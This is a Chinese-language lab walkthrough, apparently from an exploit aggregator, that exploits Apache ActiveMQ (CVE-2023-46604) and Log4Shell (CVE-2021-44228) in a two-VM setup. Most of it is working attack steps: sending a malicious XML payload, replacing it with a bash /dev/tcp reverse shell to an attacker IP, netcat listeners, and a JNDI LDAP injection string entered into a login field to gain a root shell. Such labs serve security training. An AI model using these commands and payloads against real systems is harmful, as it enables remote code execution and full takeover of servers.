## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DCM2406-CVE-LAB
# CVE-2023-46604 实验
本实验指导如何利用 CVE-2023-46604 漏洞。
## 致谢
* Apache ActiveMQ
* CVE-2023-46604
## 环境
本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:
* Kali Linux 2023.4
* Ubuntu 22.04.3 LTS
* VMware-workstation-17.5.0 for windows
* VMware-workstation-17.5.0 for linux
## 模型与系统要求

**在 Kali Linux 虚拟机上:**
安装 git
root@kitploit:~
$sudo apt install git
安装 gedit
root@kitploit:~
$sudo apt install gedit
**在 Ubuntu 虚拟机上:**
安装 git
root@kitploit:~
$sudo apt install git
安装 openjdk 18
root@kitploit:~
$sudo apt install openjdk-18-jdk
安装 ActiveMQ 5.18.2 包
root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
## 构建服务器(启动 activemq 服务)
在 Ubuntu 虚拟机上 打开终端窗口,按如下命令运行:
root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
检查服务状态:
root@kitploit:~
$./activemq status
如果服务成功启动,终端屏幕将显示 "ActiveMQ Brocker is running"。
您还可以访问 http://127.0.0.1:8161 打开 ActiveMQ 代理管理器。其中包含主机名、版本、ID、运行时间及其他信息。
## 利用
在 Kali Linux 虚拟机上
下载利用过程所需的资源:
root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
如您所见,我们有两个文件:exploit.py 和 poc.xml:
* poc.xml 文件包含一段恶意代码,用于利用 OpenWire 协议中的漏洞。
* exploit.py 文件负责进行 HTTP 加密并将 poc.xml 文件发送到目标机器上的代理。 在资源路径下打开一个 Web 服务器:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server
打开一个新终端窗口,通过 exploit.py 文件将 poc.xml 发送到目标服务器:
root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
命令执行后,目标机器上会启动计算器应用程序。这证明漏洞已被成功利用。接下来我们创建反弹 shell 来控制目标机器。
打开一个新终端窗口,监听反弹 shell 连接:
root@kitploit:~
$sudo su
$nc -nlvp 4444
返回上一个终端,编辑 poc.xml 文件:
root@kitploit:~
$gedit poc.xml
将 **gnome-calculator** 值替换为 **bash -i >& /dev/tcp/192.168.132.130/4444 0>&1** 并保存文件。
再次发送恶意代码:
root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
该命令的结果是我们获得了目标机器的 root shell。已 ROOTED!!!
# CVE-2021-44228 实验
## 致谢
* Apache log4j
* CVE-2023-44228 - log4shell
## 环境
本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:
* Kali Linux 2023.4
* Ubuntu 22.04.3 LTS
* VMware-workstation-17.5.0 for windows
* VMware-workstation-17.5.0 for linux
## 模型与系统要求

**在 Kali Linux 虚拟机上:**
安装 git
root@kitploit:~
$sudo apt install git
安装 gedit
root@kitploit:~
$sudo apt install gedit
**在 Ubuntu 虚拟机上:**
安装 git
root@kitploit:~
$sudo apt install git
安装 docker
root@kitploit:~
$sudo apt install docker.io
## 构建 Web 服务器
在 Ubuntu 虚拟机上
步骤 1:下载 openjdk
root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz
步骤 2:下载并构建 docker 文件
root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228
完成以上命令后,我们就有了一个网站。要浏览该网站,您可以使用 URL:http://<ubuntu_ip>:8080。在本教程中,地址形式为:http://192.168.132.135:8080
## 利用
在 Kali Linux 虚拟机上,下载利用漏洞所需的资源
下载 poc
root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt
下载 openjdk
root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
//将 openjdk 文件移动到包含 poc 文件的目录
$mv jdk-8u20-linux-x64.tar.gz <包含 poc 文件的目录路径>
$tar -xf jdk-8u20-linux-x64.tar.gz //解压文件
打开一个新终端,监听反弹 shell 连接:
root@kitploit:~
$sudo su
$nc -nlvp 9001
启动 LDAP 和 HTTP 服务(使用 poc 文件)
root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080
该命令将返回类似以下的结果
root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}
[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389
这里,我们只对生成的 jndi 值感兴趣。 打开 Web 浏览器,输入您之前创建的网站地址。 使用 jndi 值登录。此时,netcat 终端将收到连接。 ROOTED!!!
## 文档
CVE 研究报告
## 支持
如有问题,请发送邮件至 some-email@example.com
## 作者
* @dcm2406
* @tCu0n9